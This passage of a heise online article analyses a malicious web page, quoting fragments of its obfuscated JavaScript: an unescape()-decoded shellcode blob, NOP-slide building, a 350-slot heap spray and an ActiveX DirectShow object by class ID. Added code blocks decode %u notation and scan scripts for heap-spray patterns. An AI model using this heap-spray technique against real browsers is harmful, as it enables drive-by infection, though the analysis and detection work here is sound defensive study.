In association with heise online

Sprayer at work

So the only purpose of obfuscating all this code is to embed yet another iFrame. We start again from the beginning: download the file and open it in an editor. What we find is another long block of encoded characters:

var z4wurLU =
"%uA164%u0018%u0000%u408B%u8B30
[ ... ]
%u6944%u6572%u7463%u5F58%u5344";

And this time, the whole thing is unpacked via unescape():

var ZqEs8Ui = unescape(z4wurLU);

However, these encoded hex values look more like shellcode to me – machine-code instructions that are to be injected via a security hole and then executed. The next line confirms this:

var D4aFw4Q = unescape("%u9" + "090%u9" + "09" + "0");

It contains several instances of the hex value 0x90. This is the opcode of the x86 machine instruction "No Operation" – that is, "do nothing", NOP for short. Many exploits use this instruction as a filler. Then another loop:

while(...)D4aFw4Q += D4aFw4Q;

Since this is nested in a further loop, the hdwPhXe variable ends up receiving several thousand NOP instructions. I knew it – this is somebody building what is called a NOP slide.
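What an analyst wants at this point is the raw bytes behind the %u notation, so the blob can be hashed for an indicator or handed to a disassembler, and a quick measure of how much of a buffer is NOP filler. The following decoder is an added example, not code from the article or from the sample it analyses; it assumes the usual layout on the x86 Windows targets of this kind of exploit, where a JavaScript string is stored as little-endian UTF-16, so "%uA164" occupies the bytes 0x64 0xA1. The sample inputs are the page's own filler expression and only the leading code units of the z4wurLU blob quoted above.

```javascript
// Added example (not from the article): turn the %uXXXX / %XX notation that
// unescape() accepts into the bytes the resulting string occupies in memory.
// Assumption: little-endian UTF-16 storage, as on 32-bit Windows browsers.
function decodeUnescapeBytes(encoded) {
  const bytes = [];
  let i = 0;
  while (i < encoded.length) {
    let unit;                                   // one UTF-16 code unit
    if (encoded[i] === '%' && encoded[i + 1] === 'u') {
      const hex = encoded.slice(i + 2, i + 6);
      if (!/^[0-9a-fA-F]{4}$/.test(hex)) throw new Error(`malformed %u escape at offset ${i}`);
      unit = parseInt(hex, 16);
      i += 6;
    } else if (encoded[i] === '%') {
      const hex = encoded.slice(i + 1, i + 3);  // %XX: a single Latin-1 character
      if (!/^[0-9a-fA-F]{2}$/.test(hex)) throw new Error(`malformed %XX escape at offset ${i}`);
      unit = parseInt(hex, 16);
      i += 3;
    } else {
      unit = encoded.charCodeAt(i);             // literal character, left as-is by unescape()
      i += 1;
    }
    bytes.push(unit & 0xff, unit >> 8);         // low byte first (little-endian)
  }
  return bytes;
}

// How much of a decoded buffer is 0x90, and the longest unbroken run of it.
// A buffer that is almost all NOPs with a tail of other bytes is the
// "slide followed by shellcode" layout described in the article.
function nopProfile(bytes) {
  let nops = 0, run = 0, longestRun = 0;
  for (const b of bytes) {
    if (b === 0x90) {
      nops++;
      run++;
      if (run > longestRun) longestRun = run;
    } else {
      run = 0;
    }
  }
  return { total: bytes.length, nops, longestRun, fraction: bytes.length ? nops / bytes.length : 0 };
}

function toHex(bytes) {
  return bytes.map(b => b.toString(16).padStart(2, '0')).join(' ');
}

// Sample inputs taken from the article: the split-up filler expression and the
// first five code units of z4wurLU (the rest of the blob is not reproduced).
const FILLER = '%u9' + '090%u9' + '09' + '0';          // evaluates to "%u9090%u9090"
const PAYLOAD_HEAD = '%uA164%u0018%u0000%u408B%u8B30';

console.log(toHex(decodeUnescapeBytes(FILLER)));        // 90 90 90 90
console.log(toHex(decodeUnescapeBytes(PAYLOAD_HEAD)));  // 64 a1 18 00 00 00 8b 40 30 8b
console.log(nopProfile(decodeUnescapeBytes(FILLER + FILLER + PAYLOAD_HEAD)));
```

The byte order is the detail that trips people up: "%u9090" is harmless to get wrong because both bytes are the same, but every other code unit in the blob comes out swapped if the decoder writes the high byte first.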


Figure: Heap spraying prepares the working memory in such a way that an untargeted jump is bound to land on one of the NOP slides that end in shellcode.
NOP slides are often used in heap spraying attacks. Exploit authors tend to face the problem that, although they can redirect a jump in the regular code, they don't quite know where to jump to. It is usually impossible to predict which memory address the exploit code will end up in.

Therefore, authors simply overwrite the entire memory with a large number of these long do-nothing slides and place the intended code at the end. Then they instruct the program to jump to a random address, knowing that it is bound to hit one of the slides, do "nothing" a few thousand times and finally end up at the injected code.

And here's the heap spraying:

var fa5iZhc = new Array();
for (IF7Dfmj = 0; IF7Dfmj < 350; IF7Dfmj++ ){
fa5iZhc[IF7Dfmj] = hdwPhXe + ZqEs8Ui
}

This code sets up 350 of these slides in memory, each consisting of a few thousand NOPs followed by the shellcode from ZqEs8Ui. The stage is set for the main act! And here it is:

var bC44pzT = document.createElement('object');
....
bC44pzT.data = 'dx_ds.gif';
bC44pzT.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

One of the first hits when searching the internet for class ID 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF is "Web pages infect Windows PCs via new DirectShow hole".
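The spray loop above and the classid-based instantiation are exactly the building blocks a proxy filter or an analyst's triage script looks for. The scanner below is an added example, not code from the article; it never executes the script, it only searches the source text for those building blocks and adds up a score. The weights, the score threshold and the tiny class-ID list are assumptions made here (the list holds only the ID the article looks up; a real deployment would feed it from a vulnerability database). The suspicious sample is assembled from the lines quoted in the article with the shellcode blob omitted; the benign sample is constructed.

```javascript
// Added example (not from the article): static triage for the heap-spray
// pattern walked through above. Weights and threshold are assumptions.

// Class IDs worth flagging on sight. Only the ID named in the article is
// listed here; a real list would come from a vulnerability feed.
const KNOWN_BAD_CLSIDS = new Set([
  '0955AC62-BF2E-4CBA-A2B9-A63F772D46CF',
]);

// Join string literals split with '+' to hide a signature, e.g.
// "%u9" + "090" -> "%u9090". Only same-quote pairs are folded; this is a
// triage heuristic, not a JavaScript parser.
function foldConcatenatedLiterals(source) {
  return source.replace(/(["'])\s*\+\s*\1/g, '');
}

function scanForHeapSpray(source) {
  const text = foldConcatenatedLiterals(source);
  const findings = [];
  let score = 0;
  const hit = (name, weight) => { findings.push(name); score += weight; };

  if (/unescape\s*\(/.test(text)) hit('unescape() of encoded data', 1);

  // %u9090 decodes to two 0x90 bytes; a literal made of nothing else is NOP filler
  const nopFiller = text.match(/(["'])((?:%u9090)+)\1/i);
  if (nopFiller) hit(`NOP filler literal (${nopFiller[2].length / 6} x %u9090)`, 2);

  // x += x inside a loop doubles the buffer on every pass: the slide builder
  const doubling = text.match(/(?:while|for)\s*\([^)]*\)[^;]*?\b(\w+)\s*\+=\s*\1\b/);
  if (doubling) hit(`self-doubling string ${doubling[1]} += ${doubling[1]}`, 2);

  // a loop that fills hundreds of array slots with the same concatenation
  const fill = text.match(
    /for\s*\([^;]*;\s*\w+\s*<\s*(\d+)\s*;[^)]*\)\s*\{?\s*(\w+)\s*\[\s*\w+\s*\]\s*=\s*\w+\s*\+\s*\w+/
  );
  if (fill && Number(fill[1]) >= 100) hit(`array ${fill[2]} filled ${fill[1]} times with concatenated strings`, 3);

  // ActiveX instantiation by class ID; a known-vulnerable ID weighs more
  const clsid = text.match(/\.classid\s*=\s*['"]clsid:([0-9A-F-]{36})['"]/i);
  if (clsid) {
    const id = clsid[1].toUpperCase();
    hit(`object instantiated by classid ${id}`, KNOWN_BAD_CLSIDS.has(id) ? 4 : 1);
  }

  return { score, findings, verdict: score >= 6 ? 'likely heap spray' : 'no spray pattern' };
}

// Lines quoted from the article, shellcode blob omitted.
const SUSPECT_SAMPLE = `
var D4aFw4Q = unescape("%u9" + "090%u9" + "09" + "0");
while(...)D4aFw4Q += D4aFw4Q;
var fa5iZhc = new Array();
for (IF7Dfmj = 0; IF7Dfmj < 350; IF7Dfmj++ ){
fa5iZhc[IF7Dfmj] = hdwPhXe + ZqEs8Ui
}
var bC44pzT = document.createElement('object');
bC44pzT.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
`;

// Constructed benign script: a small loop and an ordinary image element.
const BENIGN_SAMPLE = `
var img = document.createElement('img');
img.src = 'logo.gif';
var cells = new Array();
for (var i = 0; i < 3; i++) { cells[i] = prefix + i; }
`;

console.log(scanForHeapSpray(SUSPECT_SAMPLE));   // score 12, five findings
console.log(scanForHeapSpray(BENIGN_SAMPLE));    // score 0
```

Folding the split literals first is what makes the %u9090 check fire at all: without it the "%u9" + "090%u9" + "09" + "0" trick defeats a naive substring match, which is precisely why the author of the sample split the string. Conversely, the benign loop is ignored because its iteration count is far below the threshold, so plain array-building code does not raise the score.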

Next: Gotcha!

Permalink: http://h-online.com/-1019940